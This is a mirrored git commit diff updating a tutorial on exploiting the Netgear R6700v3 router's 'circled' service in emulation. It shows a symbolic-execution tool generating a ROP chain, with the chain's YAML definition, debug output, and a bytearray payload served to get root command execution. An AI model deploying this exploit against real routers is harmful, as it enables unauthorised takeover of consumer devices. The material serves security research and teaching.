mirror of
https://github.com/cyber-defence-campus/netgear_r6700v3_circled
synced 2026-08-09 12:29:06 +00:00
Update section morion_rop_generator
This commit is contained in:
+29
-11
@@ -15,6 +15,8 @@
|
||||
3. [Payload Generation](./6_exploitation.md#payload-generation)
|
||||
4. [Run PoC Exploit](./6_exploitation.md#run-poc-exploit)
|
||||
2. [Analysis Module morion_rop_generator](./6_exploitation.md#analysis-module-morion_rop_generator)
|
||||
1. [Payload Generation](./6_exploitation.md#payload-generation-1)
|
||||
2. [Run PoC Exploit](./6_exploitation.md#run-poc-exploit-1)
|
||||
<!--TODO--------------------------------------------------------------------------------------------
|
||||
- [X] Can we integrate morion/circled.rop3.py to circled.server.py?
|
||||
- [X] Try out manual exploit
|
||||
@@ -429,8 +431,13 @@ pwndbg> continue
|
||||
If the PoC exploit worked, you will find a file `/id` on the emulated router (System:
|
||||
[ARMHF Guest (chroot)](./1_setup.md#armhf-guest-system)) with the content `uid=0 gid=0(root)`.
|
||||
## Analysis Module morion_rop_generator
|
||||
|
||||
[circled.init.yaml](../morion/circled.init.yaml#L37):
|
||||
The above process to get a payload triggering the intended ROP chain is rather cumbersome, since we
|
||||
need to access register and/or memory ASTs manually to define the necessary model restrictions. That
|
||||
is where the module `morion_rop_generator` comes into play.
|
||||
### Payload Generation
|
||||
Module `morion_rop_generator` allows us to define the intended ROP chain within the trace file
|
||||
`circled.yaml` and will do the rest automatically. For instance, we included the same ROP chain as
|
||||
depicted in Figure 6.1 in [circled.init.yaml](../morion/circled.init.yaml#L37) (named `default`):
|
||||
```yaml
|
||||
[...]
|
||||
ropchains:
|
||||
@@ -448,7 +455,7 @@ ropchains:
|
||||
['0x0000c9b8', '06 00 a0 e1', 'mov r0, r6', 'Gadget 1.0']
|
||||
- preconditions:
|
||||
regs:
|
||||
'r0': '0xbeffc250' # r6 == 0xbeffc0c4+396 == 0xbeffc250
|
||||
'r0': '0xbeffc250' # r0 == 0xbeffc0c4+396 == 0xbeffc250
|
||||
mems:
|
||||
'0xbeffc250': '0x69' # 'i'
|
||||
'0xbeffc251': '0x64' # 'd'
|
||||
@@ -462,9 +469,14 @@ ropchains:
|
||||
instruction:
|
||||
['0x0000c9bc', 'b7 f2 ff eb', 'bl #0x94a0', 'Gadget 1.1']
|
||||
```
|
||||
|
||||
The module `morion_rop_generator` is then run like shown in the next excerpt. The module first
|
||||
symbolically executes the recorded trace and then tries to transfer control to the specified ROP
|
||||
chain. For each instruction in the chain it loads the given preconditions, tries to solve them,
|
||||
concretizes the found solution, symbolically executes the instruction and then proceeds with the
|
||||
next one. At the end of the chain, a potential payload is returned.
|
||||
```
|
||||
$ morion_rop_generator circled.yaml default
|
||||
|
||||
[...]
|
||||
[2024-04-16 14:16:04] [DEBG] 0x0000cf1c (ff df 8d e2): add sp, sp, #0x3fc
|
||||
[2024-04-16 14:16:04] [DEBG] 0x0000cf20 (03 db 8d e2): add sp, sp, #0xc00
|
||||
@@ -584,12 +596,16 @@ s+0464: 69 64 3b 23 00
|
||||
---
|
||||
[2024-04-16 14:16:06] [INFO] ... finished dumping payloads.
|
||||
```
|
||||
|
||||
- CyberChef *From Hex* (Delimiter: `Space`) | *To Hex* (Delimiter: `0x with comma`)
|
||||
- Merge payloads since they originate from the same file
|
||||
|
||||
[circled.server.py](../server/circled.server.py#L58):
|
||||
Since `fgets` was called twice in our trace (at trace instructions 5132 and 15451) the module
|
||||
returns two payloads, which however originate from reading the same file (`circleinfo.txt`). We
|
||||
therefore need to merge them so a single one. As before, we added the resulting payload to
|
||||
[circled.server.py](../server/circled.server.py#L57), which serves it when started with command-line
|
||||
argument `--payload "poc2"`.
|
||||
```python
|
||||
[...]
|
||||
# Serve requests for circleinfo.txt
|
||||
[...]
|
||||
elif payload == "poc2":
|
||||
p = bytearray([
|
||||
0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,
|
||||
[...]
|
||||
@@ -604,9 +620,11 @@ p = bytearray([
|
||||
0x43,0x43,0x43,0x43,0x69,0x64,0x3e,0x2f,
|
||||
0x69,0x64,0x3b,0x23,0x00
|
||||
])
|
||||
[...]
|
||||
```
|
||||
### Run PoC Exploit
|
||||
|
||||
##
|
||||
## TODO
|
||||
- Explain `circled.server.py`
|
||||
- Test reverse shell payload
|
||||
- Explain reverse shell payload
|
||||
@@ -666,7 +684,7 @@ HttpHandler.cmd_addr = cmd_addr - 0x1000
|
||||
```
|
||||
|
||||
We fill up with a nonexistent command `X...X;cmd` to improve ASLR brute-forcing?
|
||||
## Todo
|
||||
|
||||
- Note: The shown exploit could easily be generated without using symbolic execution. However, we
|
||||
have chosen it since it is rather easy to follow along and suitable to explain how Morion works.
|
||||
|
||||
|
||||
Reference in New Issue
Block a user